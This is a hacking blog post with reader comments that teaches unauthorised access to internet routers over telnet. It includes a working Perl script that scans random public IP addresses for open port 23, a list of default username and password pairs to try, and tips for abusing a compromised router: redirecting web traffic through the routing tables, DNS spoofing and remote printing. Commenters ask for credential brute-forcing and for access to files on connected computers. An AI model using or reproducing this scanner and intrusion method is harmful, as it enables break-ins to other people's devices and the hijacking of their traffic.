Hack Remote Routers Using Telnet

Telnet is a legacy remote terminal TCP/IP application used for remote administration , Telnet is notorious for transmitting communications in plain text and has long since been superseded by SSH that uses encrypted channels so it is rare to see telnet in use on the Internet .

But you will be surprised to know that most of the routers have telnet serveries running on them by default even today ,This is a serious vulnerability ,this allows malicious users to connect to the router from anywhere in the world using default credentials, and can wreak havoc.

I this article I will explain how you can scan large number of routers for telnet services, which we can then attempt to use default credentials to log in

Hack Remote Routers Using Telnet

Things You Need:-

1. Random telnet scanner originally written by Solaris (modified by me) . The program attempts to open a connections to the telnet port (23) of random ips, if it succeeds the program logs the success in a log file telnet.txt for later analysis. The program then repeats, so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet boxes .Originally the program is written in Perl but i have modified it into a batch file

You can download the modified version of random telnet scanner from Here

and to get the password click Here

2. Telnet client

For windows XP/Linux users you will already have telnet client by default but for windows 7 users you will need to enable your telnet client by following these steps

Go to ----> Start ----->Control Panel ------> Programs And Features -------->Turn Windows features on or off ,now Check Telnet Client and Hit OK

After that you can start Telnet via Command Prompt ( Cmd )

Procedure

1. First run the remote telnet scanner for 20- 30 minutes and you will end up with 10 -20 telnet boxes

2. Now you have your list of IP's with the telnet port open in telnet.txt as shown

3. Now open your telnet client and connect to the ips you will be prompted for a username and password, try the common user names and passwords like

Admin -admin

Admin - "blank password "

Root - root

Root - "blank password "

A lot of routers disclose there model number in the telnet banner when you connect ,so a simple Google search often turns up the default user name and password. Otherwise move on to the next ip

4. From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. you can even port forward packets to printers and use them across the Internet to print out hundreds of copy's A funny concept that i have got to work in the past few days is with the routing tables and redirecting every web request to different sites

A Special thanks to Solaris for the Random telnet scanner and for the information

Related Posts Plugin for WordPress, Blogger...

John ( Admin ) said on July 6, 2011 at 12:32 AM :

If the batch file is not working please copy paste the following code in a notepad and save it as router.pl , you also need active Perl to run this script

#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223; #avoid experimental and multicast
my $range2 = 254;
$oct1 = int(rand($range1)) + 1; #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen(); #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return
}
return $ip; #return to caller
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){ # keeps code running indefinatly
$target = &ipgen(); # get random ip to scan
print "*??* SCANNING: $target \n"; # output
my $sock = new IO::Socket::INET ( # try to create socket to chose random address
PeerAddr => $target,
PeerPort => '23', # change this number to change ports you want to detect
Proto => 'tcp',
Timeout => '3', # you can get away with a timeout of 1 second but i have 2 to be safe
);
if($sock){ # if socket opened (port open)
print "*!!* SUCCESS-: $target \n"; # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File"); # open results file
print DAT "SUCCESS: $target \n"; # append findings to end of file
close(DAT); # close the file
}
close($sock); # close the socket
}################################################################

us vpn said on November 16, 2011 at 9:13 PM :

I'll try this over the weekend, this looks like a cool project. Thanks.

Anonymous

The file just opens and closes...
I activated TELNET on my WINDOWS 7.
But it just keeps the same... :/

Unknown said on September 26, 2012 at 2:28 PM :

The scanner you have modified doesnt run as it states its evaluation licsence is expired??

ViralMediaNet said on November 26, 2012 at 9:12 AM :

can u modified the perl script above to generaly check admin or root passwd for every host scanned ? thx bro

e-sihinaya said on January 14, 2013 at 12:32 AM :

Can i access that Router Connected Computer files? please help me. Thanks.

John ( Admin ) said on January 17, 2013 at 8:42 PM :

@e-සිහිනය

I cant understand what you are asking, Please be more elaborate

John ( Admin ) said on April 20, 2013 at 6:53 PM :

@Yashas h.r.

Once you break into a router there are many things that you can do it depends on the router the simple thing that u can do is dns spoofing

Use the form below to comment. No spam please!!!